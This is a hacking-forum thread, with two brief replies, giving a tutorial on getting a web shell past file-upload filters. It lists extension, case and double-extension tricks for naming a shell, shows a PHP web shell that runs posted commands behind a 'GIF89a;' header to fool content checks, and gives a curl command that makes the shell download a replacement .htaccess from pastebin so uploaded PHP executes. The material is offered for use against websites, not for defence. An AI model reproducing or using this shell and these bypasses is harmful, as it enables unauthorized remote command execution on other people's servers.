Simple Trick to Bypass File Upload Problem
#1
We all know there are many ways to upload files / shell into the website. But this time I will share one trick that you may never try. Have you ever uploaded a file / shell, then when you access it, your file / shell is downloaded instead? It can be caused by .htaccess

Quote:AddType application/octet-stream .php

Then how will we manipulate it? Maybe you already know about, 
  • Bypassing the Extension Black Listing.
Quote:shell.php1, shell.php2, etc.
  • Bypass Case Sensitive Filter.
Quote:shell.PhP, shell.pHp1, etc.
  • Bypass Using Double Extension.
Quote:shell.php.jpg, shell.php.pjpeg, shell.php;jpg, etc.


But now, I'll add a little about one way, and also maybe this is a fusion of the above ways.

Fool Server Side Check Using GIF89a; Header.
Sometimes server side content signature check can be fooled using "GIF89a;" header in your shell. Then you can save the shell with .php , .php.pjpeg or many extensions above. So heres an example:

PHP Code:
GIF89a;
<?
php 
passthru
($_POST['cmd']); __halt_compiler(); //or you can insert your complete shell code
?>

Open your terminal then type command bellow,

Quote:curl -d cmd="wget https://pastebin.com/raw/H8Ju85Jp -O .htaccess" urlshell

There I replace the default .htaccess server with my own .htaccess 
After that, you can re-upload your own php shell using .abay extension (or u can change it). Or you can use wget instead.

It's all for this tutorial, will soon draw you back with another tutorial. Sorry if my language is messy Sad If you guys have an easier trick, you can write it in the comment field. Thanks!
Reply
#2
Not a bad thread! I didn't actually know about the GIF89a method before. I made a similar thread a while ago, feel free to check it out if you want some more tips & tricks. https://greysec.net/showthread.php?tid=1455
Reply
#3
I've checked our thread before, and that's was inspire me to post this thread, lol. You're awesome!
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Is it possible to bypass two factor authentication? QMark 10 9,414 04-21-2019, 09:38 PM
Last Post: MuddyBucket
  Bypass LFI filter with double encoding peanutbutter 1 8,370 12-12-2017, 06:46 AM
Last Post: blahblahblah
  Possible way to bypass Apache Mod_Security? oxid 1 7,398 08-05-2017, 09:27 PM
Last Post: lunorian
  You will earn a +1 Rep if you find the problem :D beard 9 8,309 11-11-2015, 04:50 AM
Last Post: beard